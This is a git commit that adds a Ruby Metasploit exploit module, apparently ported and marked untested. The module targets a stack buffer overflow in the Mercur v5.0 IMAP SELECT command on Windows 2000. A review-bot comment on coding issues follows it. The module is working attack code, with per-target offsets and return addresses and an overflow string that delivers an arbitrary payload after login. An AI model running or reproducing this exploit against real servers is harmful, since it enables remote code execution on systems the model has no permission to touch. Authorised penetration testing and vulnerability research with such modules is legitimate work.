ported mercur_imap_select_overflow.pm, untested.
git-svn-id: file:///home/svn/framework3/trunk@4245 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
7da10dd53e
commit
84c7edbbc5
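--- /dev/null
+++ b/PATH_NOT_ON_PAGE
@@ -0,0 +1,68 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Imap::Mercur_Imap_Select_Overflow < Msf::Exploit::Remote
+
+include Exploit::Remote::Imap
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
+'Description' => %q{
+Mercur v5.0 IMAP server is prone to a remotely exploitable
+stack-based buffer overflow vulnerability. This issue is due
+to a failure of the application to properly bounds check
+user-supplied data prior to copying it to a fixed size memory buffer.
+Credit to Tim Taylor for discover the vulnerability.
+},
+'Author' => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
+'License' => BSD_LICENSE,
+'Version' => '$Revision: 3782 $',
+'References' =>
+[
+[ 'BID', '17138' ],
+],
+'Privileged' => true,
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'process',
+},
+'Payload' =>
+{
+'Space' => 400,
+'BadChars' => "\x00",
+'StackAdjustment' => -3500,
+
+},
+'Platform' => 'win',
+'Targets' =>
+[
+['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
+['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }],
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Mar 17 2006'))
+
+end
+
+def exploit
+sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"
+sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])
+sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)
+sploit << payload.encoded + rand_text_alpha_upper(453)
+
+info = connect_login
+
+if (info == true)
+print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
+sock.put(sploit + "\r\n")
+else
+print_status("Not falling through with exploit")
+end
+
+handler
+disconnect
+end
+end
+end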
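Review bot: The `else` branch in `exploit` only prints "Not falling through with exploit" and then does fall through, so `handler` still runs after a failed `connect_login`; the branch should leave the method, e.g. `print_status("Not falling through with exploit")` / `disconnect` / `return`. The guard `if (info == true)` can be written `if info` unless `connect_login` returns a non-boolean truthy value on failure, which I cannot confirm from this hunk. The status message refers to a "heap address" while the module description and the `Ret` entries in `Targets` describe a stack-based overflow return address; `using return address at 0x%.8x` would be consistent. The description string also has a typo, `for discover the vulnerability` should read `for discovering the vulnerability`. Since the commit message marks this port as untested, a short comment above `Targets` stating that the `Offset`/`Ret` values were carried over from the original .pm module unchanged would help the next maintainer know what has and has not been verified.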